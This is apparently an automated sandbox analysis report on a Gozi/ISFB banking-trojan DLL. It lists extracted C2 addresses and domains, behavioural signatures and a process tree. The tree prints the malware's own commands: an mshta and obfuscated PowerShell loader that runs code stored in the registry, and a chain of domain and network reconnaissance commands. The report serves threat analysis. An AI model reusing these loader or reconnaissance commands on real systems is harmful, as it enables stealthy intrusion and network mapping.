Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20220721-en -
resource tags
arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system -
submitted
03-08-2022 17:54
Static task
static1
Behavioral task
behavioral1
Sample
de00c4750accf516704b8c0df265c24a.dll
Resource
win7-20220715-en
General
-
Target
de00c4750accf516704b8c0df265c24a.dll
-
Size
300KB
-
MD5
de00c4750accf516704b8c0df265c24a
-
SHA1
eddbc6019ec7ba82d3c5b4c59efe797ff1df9f75
-
SHA256
7dae6d6fb339b6114ffdd3c0b6bcaa2c9dab0a73979fec029801e9e16d7d06bc
-
SHA512
b0e6bbbdae36bd81f63dbab9296515d3a389fa6acb397476058ae202e66026ca8dc523fb35c6b7145a87d6e61e3833e396873e61e733152ccbaa39387bada96f
Malware Config
Extracted
gozi_ifsb
3000
config.edge.skype.com
37.120.206.71
37.120.206.84
193.106.191.163
-
base_path
/drew/
-
build
250240
-
exe_type
loader
-
extension
.jlk
-
server_id
50
Extracted
gozi_ifsb
3000
37.120.206.91
37.120.206.95
havefuntxmm.at
5.42.199.57
xerkdeoleone.at
-
base_path
/images/
-
build
250240
-
exe_type
worker
-
extension
.jlk
-
server_id
50
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation mshta.exe -
Suspicious use of SetThreadContext 6 IoCs
Processes:
powershell.exeExplorer.EXEdescription pid process target process PID 368 set thread context of 2228 368 powershell.exe Explorer.EXE PID 2228 set thread context of 3408 2228 Explorer.EXE RuntimeBroker.exe PID 2228 set thread context of 3608 2228 Explorer.EXE RuntimeBroker.exe PID 2228 set thread context of 3144 2228 Explorer.EXE RuntimeBroker.exe PID 2228 set thread context of 4356 2228 Explorer.EXE RuntimeBroker.exe PID 2228 set thread context of 4112 2228 Explorer.EXE cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Discovers systems in the same network 1 TTPs 3 IoCs
Processes:
net.exenet.exenet.exepid process 3936 net.exe 4636 net.exe 3340 net.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
regsvr32.exepowershell.exeExplorer.EXEpid process 3396 regsvr32.exe 3396 regsvr32.exe 368 powershell.exe 368 powershell.exe 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 2228 Explorer.EXE -
Suspicious behavior: MapViewOfSection 6 IoCs
Processes:
powershell.exeExplorer.EXEpid process 368 powershell.exe 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE 2228 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 51 IoCs
Processes:
powershell.exeExplorer.EXEWMIC.exeRuntimeBroker.exetasklist.exedescription pid process Token: SeDebugPrivilege 368 powershell.exe Token: SeShutdownPrivilege 2228 Explorer.EXE Token: SeCreatePagefilePrivilege 2228 Explorer.EXE Token: SeIncreaseQuotaPrivilege 3036 WMIC.exe Token: SeSecurityPrivilege 3036 WMIC.exe Token: SeTakeOwnershipPrivilege 3036 WMIC.exe Token: SeLoadDriverPrivilege 3036 WMIC.exe Token: SeSystemProfilePrivilege 3036 WMIC.exe Token: SeSystemtimePrivilege 3036 WMIC.exe Token: SeProfSingleProcessPrivilege 3036 WMIC.exe Token: SeIncBasePriorityPrivilege 3036 WMIC.exe Token: SeCreatePagefilePrivilege 3036 WMIC.exe Token: SeBackupPrivilege 3036 WMIC.exe Token: SeRestorePrivilege 3036 WMIC.exe Token: SeShutdownPrivilege 3036 WMIC.exe Token: SeDebugPrivilege 3036 WMIC.exe Token: SeSystemEnvironmentPrivilege 3036 WMIC.exe Token: SeRemoteShutdownPrivilege 3036 WMIC.exe Token: SeUndockPrivilege 3036 WMIC.exe Token: SeManageVolumePrivilege 3036 WMIC.exe Token: 33 3036 WMIC.exe Token: 34 3036 WMIC.exe Token: 35 3036 WMIC.exe Token: 36 3036 WMIC.exe Token: SeIncreaseQuotaPrivilege 3036 WMIC.exe Token: SeSecurityPrivilege 3036 WMIC.exe Token: SeTakeOwnershipPrivilege 3036 WMIC.exe Token: SeLoadDriverPrivilege 3036 WMIC.exe Token: SeSystemProfilePrivilege 3036 WMIC.exe Token: SeSystemtimePrivilege 3036 WMIC.exe Token: SeProfSingleProcessPrivilege 3036 WMIC.exe Token: SeIncBasePriorityPrivilege 3036 WMIC.exe Token: SeCreatePagefilePrivilege 3036 WMIC.exe Token: SeBackupPrivilege 3036 WMIC.exe Token: SeRestorePrivilege 3036 WMIC.exe Token: SeShutdownPrivilege 3036 WMIC.exe Token: SeDebugPrivilege 3036 WMIC.exe Token: SeSystemEnvironmentPrivilege 3036 WMIC.exe Token: SeRemoteShutdownPrivilege 3036 WMIC.exe Token: SeUndockPrivilege 3036 WMIC.exe Token: SeManageVolumePrivilege 3036 WMIC.exe Token: 33 3036 WMIC.exe Token: 34 3036 WMIC.exe Token: 35 3036 WMIC.exe Token: 36 3036 WMIC.exe Token: SeShutdownPrivilege 2228 Explorer.EXE Token: SeCreatePagefilePrivilege 2228 Explorer.EXE Token: SeShutdownPrivilege 3408 RuntimeBroker.exe Token: SeDebugPrivilege 4352 tasklist.exe Token: SeShutdownPrivilege 3408 RuntimeBroker.exe Token: SeShutdownPrivilege 3408 RuntimeBroker.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
Explorer.EXEpid process 2228 Explorer.EXE 2228 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Explorer.EXEpid process 2228 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
regsvr32.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.execmd.execmd.execmd.exedescription pid process target process PID 5068 wrote to memory of 3396 5068 regsvr32.exe regsvr32.exe PID 5068 wrote to memory of 3396 5068 regsvr32.exe regsvr32.exe PID 5068 wrote to memory of 3396 5068 regsvr32.exe regsvr32.exe PID 1104 wrote to memory of 368 1104 mshta.exe powershell.exe PID 1104 wrote to memory of 368 1104 mshta.exe powershell.exe PID 368 wrote to memory of 4084 368 powershell.exe csc.exe PID 368 wrote to memory of 4084 368 powershell.exe csc.exe PID 4084 wrote to memory of 1064 4084 csc.exe cvtres.exe PID 4084 wrote to memory of 1064 4084 csc.exe cvtres.exe PID 368 wrote to memory of 1228 368 powershell.exe csc.exe PID 368 wrote to memory of 1228 368 powershell.exe csc.exe PID 1228 wrote to memory of 4548 1228 csc.exe cvtres.exe PID 1228 wrote to memory of 4548 1228 csc.exe cvtres.exe PID 368 wrote to memory of 2228 368 powershell.exe Explorer.EXE PID 368 wrote to memory of 2228 368 powershell.exe Explorer.EXE PID 368 wrote to memory of 2228 368 powershell.exe Explorer.EXE PID 368 wrote to memory of 2228 368 powershell.exe Explorer.EXE PID 2228 wrote to memory of 3408 2228 Explorer.EXE RuntimeBroker.exe PID 2228 wrote to memory of 3408 2228 Explorer.EXE RuntimeBroker.exe PID 2228 wrote to memory of 3408 2228 Explorer.EXE RuntimeBroker.exe PID 2228 wrote to memory of 3408 2228 Explorer.EXE RuntimeBroker.exe PID 2228 wrote to memory of 3608 2228 Explorer.EXE RuntimeBroker.exe PID 2228 wrote to memory of 3608 2228 Explorer.EXE RuntimeBroker.exe PID 2228 wrote to memory of 3608 2228 Explorer.EXE RuntimeBroker.exe PID 2228 wrote to memory of 3608 2228 Explorer.EXE RuntimeBroker.exe PID 2228 wrote to memory of 3144 2228 Explorer.EXE RuntimeBroker.exe PID 2228 wrote to memory of 3144 2228 Explorer.EXE RuntimeBroker.exe PID 2228 wrote to memory of 3144 2228 Explorer.EXE RuntimeBroker.exe PID 2228 wrote to memory of 3144 2228 Explorer.EXE RuntimeBroker.exe PID 2228 wrote to memory of 4356 2228 Explorer.EXE RuntimeBroker.exe PID 2228 wrote to memory of 4356 2228 Explorer.EXE RuntimeBroker.exe PID 2228 wrote to memory of 4356 2228 Explorer.EXE RuntimeBroker.exe PID 2228 wrote to memory of 4356 2228 Explorer.EXE RuntimeBroker.exe PID 2228 wrote to memory of 2028 2228 Explorer.EXE cmd.exe PID 2228 wrote to memory of 2028 2228 Explorer.EXE cmd.exe PID 2228 wrote to memory of 4112 2228 Explorer.EXE cmd.exe PID 2228 wrote to memory of 4112 2228 Explorer.EXE cmd.exe PID 2228 wrote to memory of 4112 2228 Explorer.EXE cmd.exe PID 2228 wrote to memory of 4112 2228 Explorer.EXE cmd.exe PID 2028 wrote to memory of 3036 2028 cmd.exe WMIC.exe PID 2028 wrote to memory of 3036 2028 cmd.exe WMIC.exe PID 2028 wrote to memory of 4648 2028 cmd.exe more.com PID 2028 wrote to memory of 4648 2028 cmd.exe more.com PID 2228 wrote to memory of 4112 2228 Explorer.EXE cmd.exe PID 2228 wrote to memory of 4112 2228 Explorer.EXE cmd.exe PID 2228 wrote to memory of 4524 2228 Explorer.EXE cmd.exe PID 2228 wrote to memory of 4524 2228 Explorer.EXE cmd.exe PID 2228 wrote to memory of 4496 2228 Explorer.EXE cmd.exe PID 2228 wrote to memory of 4496 2228 Explorer.EXE cmd.exe PID 4496 wrote to memory of 3512 4496 cmd.exe systeminfo.exe PID 4496 wrote to memory of 3512 4496 cmd.exe systeminfo.exe PID 2228 wrote to memory of 632 2228 Explorer.EXE cmd.exe PID 2228 wrote to memory of 632 2228 Explorer.EXE cmd.exe PID 2228 wrote to memory of 5076 2228 Explorer.EXE cmd.exe PID 2228 wrote to memory of 5076 2228 Explorer.EXE cmd.exe PID 5076 wrote to memory of 3936 5076 cmd.exe net.exe PID 5076 wrote to memory of 3936 5076 cmd.exe net.exe PID 2228 wrote to memory of 3564 2228 Explorer.EXE cmd.exe PID 2228 wrote to memory of 3564 2228 Explorer.EXE cmd.exe PID 2228 wrote to memory of 1960 2228 Explorer.EXE cmd.exe PID 2228 wrote to memory of 1960 2228 Explorer.EXE cmd.exe PID 1960 wrote to memory of 4004 1960 cmd.exe nslookup.exe PID 1960 wrote to memory of 4004 1960 cmd.exe nslookup.exe PID 2228 wrote to memory of 1968 2228 Explorer.EXE cmd.exe
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3408
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4356
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3144
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3608
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2228 -
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll2⤵
- Suspicious use of WriteProcessMemory
PID:5068 -
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3396 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Fvgb='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Fvgb).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\EE2128B7-7580-5017-6F02-79841356BDF8\\\ChipUrls'));if(!window.flag)close()</script>"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1104 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rxgwsyrt -value gp; new-alias -name mjbjtinden -value iex; mjbjtinden ([System.Text.Encoding]::ASCII.GetString((rxgwsyrt "HKCU:Software\AppDataLow\Software\Microsoft\EE2128B7-7580-5017-6F02-79841356BDF8").BlackVirtual))3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:368 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tjqwukuz\tjqwukuz.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:4084 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFAD0.tmp" "c:\Users\Admin\AppData\Local\Temp\tjqwukuz\CSCC10E6909227340609AFC522872CD7CB3.TMP"5⤵PID:1064
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\evo4kxhq\evo4kxhq.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1228 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFB9B.tmp" "c:\Users\Admin\AppData\Local\Temp\evo4kxhq\CSCAD08408EB8DB4D1EA4C66DC9C3D7502F.TMP"5⤵PID:4548
-
C:\Windows\system32\cmd.execmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\C84E.bin1"2⤵
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get domain3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3036 -
C:\Windows\system32\more.commore3⤵PID:4648
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵PID:4112
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"2⤵PID:4524
-
C:\Windows\system32\cmd.execmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\C84E.bin1"2⤵
- Suspicious use of WriteProcessMemory
PID:4496 -
C:\Windows\system32\systeminfo.exesysteminfo.exe3⤵
- Gathers system information
PID:3512 -
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"2⤵PID:632
-
C:\Windows\system32\cmd.execmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"2⤵
- Suspicious use of WriteProcessMemory
PID:5076 -
C:\Windows\system32\net.exenet view3⤵
- Discovers systems in the same network
PID:3936 -
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"2⤵PID:3564
-
C:\Windows\system32\cmd.execmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"2⤵
- Suspicious use of WriteProcessMemory
PID:1960 -
C:\Windows\system32\nslookup.exenslookup 127.0.0.13⤵PID:4004
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"2⤵PID:1968
-
C:\Windows\system32\cmd.execmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"2⤵PID:4940
-
C:\Windows\system32\tasklist.exetasklist.exe /SVC3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4352 -
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"2⤵PID:3404
-
C:\Windows\system32\cmd.execmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"2⤵PID:3068
-
C:\Windows\system32\driverquery.exedriverquery.exe3⤵PID:4932
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"2⤵PID:2444
-
C:\Windows\system32\cmd.execmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"2⤵PID:4324
-
C:\Windows\system32\reg.exereg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s3⤵PID:5012
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"2⤵PID:332
-
C:\Windows\system32\cmd.execmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"2⤵PID:528
-
C:\Windows\system32\net.exenet config workstation3⤵PID:2148
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 config workstation4⤵PID:2796
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"2⤵PID:3224
-
C:\Windows\system32\cmd.execmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"2⤵PID:2408
-
C:\Windows\system32\nltest.exenltest /domain_trusts3⤵PID:440
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"2⤵PID:3472
-
C:\Windows\system32\cmd.execmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"2⤵PID:384
-
C:\Windows\system32\nltest.exenltest /domain_trusts /all_trusts3⤵PID:3188
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"2⤵PID:1956
-
C:\Windows\system32\cmd.execmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"2⤵PID:4600
-
C:\Windows\system32\net.exenet view /all /domain3⤵
- Discovers systems in the same network
PID:4636 -
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"2⤵PID:1960
-
C:\Windows\system32\cmd.execmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"2⤵PID:3284
-
C:\Windows\system32\net.exenet view /all3⤵
- Discovers systems in the same network
PID:3340 -
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"2⤵PID:2584
-
C:\Windows\system32\cmd.execmd /U /C "type C:\Users\Admin\AppData\Local\Temp\C84E.bin1 > C:\Users\Admin\AppData\Local\Temp\C84E.bin & del C:\Users\Admin\AppData\Local\Temp\C84E.bin1"2⤵PID:5084
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
65KB
MD5d24095fff019c1905b23a0a36e2558a0
SHA104c2fa62e1a546a4023f03d41c355f7aba1e29c0
SHA2561a16cda7d043f864430a1618e34b7939fd0a4afd11f19924614cf6a047977975
SHA5125cecf1ed73cef369c3c4b88f876887c907bf5e652c12a6533d36a13c1fc31cd85249d8c67b60bd76c91ae80e2eb2e3f13450c1765b11d8c3eb0ace179ed2d3ec
-
Filesize
44B
MD5f7aea2435aa888b709ca20f816c33bfd
SHA138717c9a73b5f8bd399839cbe0aa57518427e758
SHA256f0c30a157e0a0ea84b114c2b66a66d444a3824c2bfe7829d929b40e6548fa5d5
SHA5121ea828fc1932c97f5ba5f6ebf05f2816d4d89f003b094f2d0868d54f52b53774437037e2c8837e97b820d5f2e5d5707825b048a9ab2af261af00810f01bd8232
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
2KB
MD5c5fdae5ce528921debb77ec3a788f5d9
SHA1b781445e7448511a05676d2f9beb917eab07840b
SHA256a0efd156fdd7213c77221a000f592b13f0b3002a0d08dd973ca067a1973af37d
SHA5125cf5fde0ca29443393eaa011c4f9d4b82e0e6c143533aa37f117971e44b685d0fb7d5cc9001e51e643310ab51477021e185005fe4d5651b5192cb04c56211672
-
Filesize
2KB
MD569ad62f9a6cdb4bdd48d821965911723
SHA12f47ada4cfbdff3c90b00738dcb673f350242211
SHA256cd0b2c087c0edfbc5deca4ed2dd590e579cf2f36a5c5abe600f12e5f8b1d0e14
SHA5124b7c107289605c9b3258fa0f3fe37f034cf2ffeba25e7fccc6b6c8ece8fb8ca5b0df818293cd3a98665c67230264ec4754103cfe74dd58fba8199fe17b4e6204
-
Filesize
2KB
MD595095ab4f924068a35994172fd75caa9
SHA197c7b4453a047aec9a08d08b8f5c3502e1a3026a
SHA256a5031a299f19664e1824fc66c9bf8e7971367b3f7a3ed281598d5b689cb0f36a
SHA51250dccef47c5b5fbf634c7a6839b434d9b3e8ac15be4bd1a9bed1011a5ed6ade89c832d29fcdd85efe9965572631e76b8966df530a701d24472a80f2918fcde9a
-
Filesize
2KB
MD55aee054b73a165dd06364a6cadf97d37
SHA188c158780170981eb959a4dcdc33de04d6eba459
SHA2565e79f3109fd902d8fe85cfaca98784a66dc057602b911cc53a0701343d42fc76
SHA5123f79d63a425dc3eb873350c312bc4d1d9b7f9d47c23d0c5d543b5df5f0a016dce955b110f6b21a4683281d643b5478aa495553808dc3a5e109cdebc8c9288d88
-
Filesize
2KB
MD55aee054b73a165dd06364a6cadf97d37
SHA188c158780170981eb959a4dcdc33de04d6eba459
SHA2565e79f3109fd902d8fe85cfaca98784a66dc057602b911cc53a0701343d42fc76
SHA5123f79d63a425dc3eb873350c312bc4d1d9b7f9d47c23d0c5d543b5df5f0a016dce955b110f6b21a4683281d643b5478aa495553808dc3a5e109cdebc8c9288d88
-
Filesize
9KB
MD5521fcaee7ce20f173abb6bdfabd0c4fc
SHA155e53f3fe041e2cda4e1fa05ab0bfc07595fef65
SHA2565059bbf9e1259bdfc70ac9b422f617be80837f6f10e79326a212a3886399dbc6
SHA512be139025ab23374f8629e296fc841cc64cc4b453bfbe2a136ef5b495e0e0491a7edd40ee706d06f2770fa737b337e900dba1d3a6aaa24eb191f2a790cfc04342
-
Filesize
9KB
MD5521fcaee7ce20f173abb6bdfabd0c4fc
SHA155e53f3fe041e2cda4e1fa05ab0bfc07595fef65
SHA2565059bbf9e1259bdfc70ac9b422f617be80837f6f10e79326a212a3886399dbc6
SHA512be139025ab23374f8629e296fc841cc64cc4b453bfbe2a136ef5b495e0e0491a7edd40ee706d06f2770fa737b337e900dba1d3a6aaa24eb191f2a790cfc04342
-
Filesize
35KB
MD52024b2d8818db6b77b329d6c9655560a
SHA18e9f768cc8bd34acf0c9cf66c7839afef78d5a62
SHA2562ff49317548fbd86734d346c7d40718c471e3697a715fd87aca2b648fd76dc6e
SHA5125c5aca72f5c5196beace4c95c243a976ea998b07cf4a72b33bf0dd623a130c0def377964cce5f9c4b66c2bb786fc9dec195cd56c64afae447b771fab354c03bb
-
Filesize
35KB
MD5203f4b05600dcd3ae44988ff66a58a4d
SHA174d7b1d7a2b1e6eb6b57ef10e9fa2749f0c59530
SHA2566e5eccc800679f1410d3623a8138d716267b8dfd88381fc220f06989a80d2131
SHA512e0eb55c754603a4ee0c3d1e6b375a97ab5a81e447ac1012c6b4f9bae40d75127a265c40d643f177baf599b2fb61ae895b087b0803d91cee9b9994b5319fa5638
-
Filesize
64KB
MD5c94acbad901d92c33b0b52e648971b40
SHA1c87804e969d60e7b5d3a22321f92949c97f603c7
SHA2566a551573ee7aee515b774736a88cb2e4c5c827c4d1970b6246db1d4eaf81adaa
SHA512cf01e48a339dd5cc14cb621c23e13b55a381fd78b7d36d22c4abcc80a62c65af4094bc4374b97d37d350c7c5c147fc353945930c317d2aad8c7d7f4e6d66a3e8
-
Filesize
64KB
MD5c94acbad901d92c33b0b52e648971b40
SHA1c87804e969d60e7b5d3a22321f92949c97f603c7
SHA2566a551573ee7aee515b774736a88cb2e4c5c827c4d1970b6246db1d4eaf81adaa
SHA512cf01e48a339dd5cc14cb621c23e13b55a381fd78b7d36d22c4abcc80a62c65af4094bc4374b97d37d350c7c5c147fc353945930c317d2aad8c7d7f4e6d66a3e8
-
Filesize
65KB
MD5ccdb7362c3facd270aef6fdebd7a521c
SHA1e5c048eb5c7363330bd2ae8a05394e87dfe7eaec
SHA256ac035abc62244ccda34311bdfdf060964cb3c9446a6d6efd265ce582d2c83f89
SHA512afa219b137bb4ec25c0eda22b3bc3f48b28141e70ad8f6e13e51c46709f22b45b2a6bd05ebcc066ad544d6ad11a62eb25ae8d863b6f08c4cbf8d171cd375b37e
-
Filesize
65KB
MD5ccdb7362c3facd270aef6fdebd7a521c
SHA1e5c048eb5c7363330bd2ae8a05394e87dfe7eaec
SHA256ac035abc62244ccda34311bdfdf060964cb3c9446a6d6efd265ce582d2c83f89
SHA512afa219b137bb4ec25c0eda22b3bc3f48b28141e70ad8f6e13e51c46709f22b45b2a6bd05ebcc066ad544d6ad11a62eb25ae8d863b6f08c4cbf8d171cd375b37e
-
Filesize
65KB
MD5b86b5ce676d2762f9239f3799f4923d6
SHA1a636d2065f055b13d264dee3d4aa20c15eff58a8
SHA256c736d9e8eab82971bb42851691f1c2bbd29a2add22b2b96211978e366507b0db
SHA5121456f0853fad4d32eb92bbb3b469dd2e95b38b2010b737e9e504217584f68d2d3182587e48ecde67372907f33319fe71761f8e65910e746b41cdea02ae30c0d0
-
Filesize
65KB
MD5f953ea519e7e4dfee5083af160dc20ca
SHA170868d404bacfac17ea1a3b8d8b8e318db9c6fc5
SHA25636c4bbf2a2193ad5a060f310310415cd22f4765bcf7da61b637f95c93d256a1a
SHA512ce29e73e0b2d8cfaa3dbbdda8a9ff32c9d0767059d378752d9322c90ec580edb71857f22ea73629c7ae519898a81140081c99a58837057f3549064407012ae5e
-
Filesize
65KB
MD5f82a8b26864770b789391418b382dadb
SHA12ec52906a20dbf81d233c20322ec308995740cb0
SHA2564d98fa06030a50afc5282e439e5a0d54749ad23d3399e19ee897fbb4946f6e68
SHA512f41df734748ca2417cde27f3c36ec948ca596985d55d4915ca6c0c65de09493bd957c6ab6eed29c60fe2b7525d46d16673732db98ff51a3ff2b419cf674b40a5
-
Filesize
65KB
MD5d24095fff019c1905b23a0a36e2558a0
SHA104c2fa62e1a546a4023f03d41c355f7aba1e29c0
SHA2561a16cda7d043f864430a1618e34b7939fd0a4afd11f19924614cf6a047977975
SHA5125cecf1ed73cef369c3c4b88f876887c907bf5e652c12a6533d36a13c1fc31cd85249d8c67b60bd76c91ae80e2eb2e3f13450c1765b11d8c3eb0ace179ed2d3ec
-
Filesize
1KB
MD52bba2d3a3f5eceaf9fd5982bb1f4ffcd
SHA12069afb8433594dea4bed313bca99e13a936ff86
SHA256e5e40879b657dc1a235ab7e907e4e500745b973e7bd411d0da7fd66469dcf473
SHA5126e1bc08b6776cd917f7e0507c6aa9d05e1db5e68ecdcc15a331963bbe243b1d0a6766cde21de0dbc279b261d66db8d434005dabe7df2ada7c689c60fff31e18e
-
Filesize
1KB
MD5f624c26689ff72265aa896cf3005bb01
SHA1c9367117bba69f3fc1027b8931b6e3c57c647145
SHA256de26947e3348391f149a7f5f86fb7b006e83a70516f79f6b0908791522697070
SHA51282252d90f2f8539431de92e3d835b4569791b9765c7d6361a6135ac2998865a852a70e37f368e9d7f0e8bc9a14da335bdddc1c2465bfeb2be4d16709691b88eb
-
